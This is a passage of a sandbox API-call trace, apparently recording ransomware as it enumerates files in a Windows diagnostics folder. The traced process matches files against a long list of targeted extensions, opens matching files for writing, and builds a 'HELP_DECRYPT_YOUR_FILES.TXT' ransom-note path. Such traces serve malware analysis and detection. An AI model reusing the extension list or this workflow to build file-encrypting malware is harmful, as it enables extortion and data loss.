fr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0168.346] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.346] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.346] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.siuf.xml" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.siuf.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0168.347] CloseHandle (hObject=0xffffffff) returned 1
	[0168.347] CloseHandle (hObject=0xffffffff) returned 1
	[0168.347] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows.Uif.static", cAlternateFileName="WINDOW~1.STA")) returned 1
	[0168.347] lstrcmpW (lpString1="Windows.Uif.static", lpString2="..") returned 1
	[0168.347] lstrcmpW (lpString1="Windows.Uif.static", lpString2=".") returned 1
	[0168.347] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\"
	[0168.347] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\", lpString2="Windows.Uif.static" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\Windows.Uif.static") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\Windows.Uif.static"
	[0168.347] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\Windows.Uif.static") returned 77
	[0168.348] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.348] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\Windows.Uif.static", cchLength=0x4d | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.static") returned 0x4d
	[0168.348] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.348] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.static", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.348] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.static" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.static") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.static"
	[0168.348] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.static") returned 77
	[0168.348] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.349] StrStrW (lpFirst=".static", lpSrch=".") returned=".static"
	[0168.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.349] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".static") returned 0x0
	[0168.349] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe080ca95, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.UIF.xml", cAlternateFileName="WICECA~1.XML")) returned 1
	[0168.349] lstrcmpW (lpString1="WINDOWS.UIF.xml", lpString2="..") returned 1
	[0168.349] lstrcmpW (lpString1="WINDOWS.UIF.xml", lpString2=".") returned 1
	[0168.350] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\"
	[0168.350] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\", lpString2="WINDOWS.UIF.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml"
	[0168.350] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml") returned 74
	[0168.350] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.350] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml", cchLength=0x4a | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.xml") returned 0x4a
	[0168.350] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.350] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.350] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.xml" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.xml") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.xml"
	[0168.351] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.xml") returned 74
	[0168.351] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.351] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0168.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.351] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0168.352] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.352] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.352] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.xml" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0168.352] CloseHandle (hObject=0xffffffff) returned 1
	[0168.352] CloseHandle (hObject=0xffffffff) returned 1
	[0168.353] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe080ca95, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.UIF.xml", cAlternateFileName="WICECA~1.XML")) returned 0
	[0168.459] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0168.463] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0168.464] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios"
	[0168.464] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*.*"
	[0168.464] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.469] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.469] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\HELP_DECRYPT_YOUR_FILES.TXT") returned 86
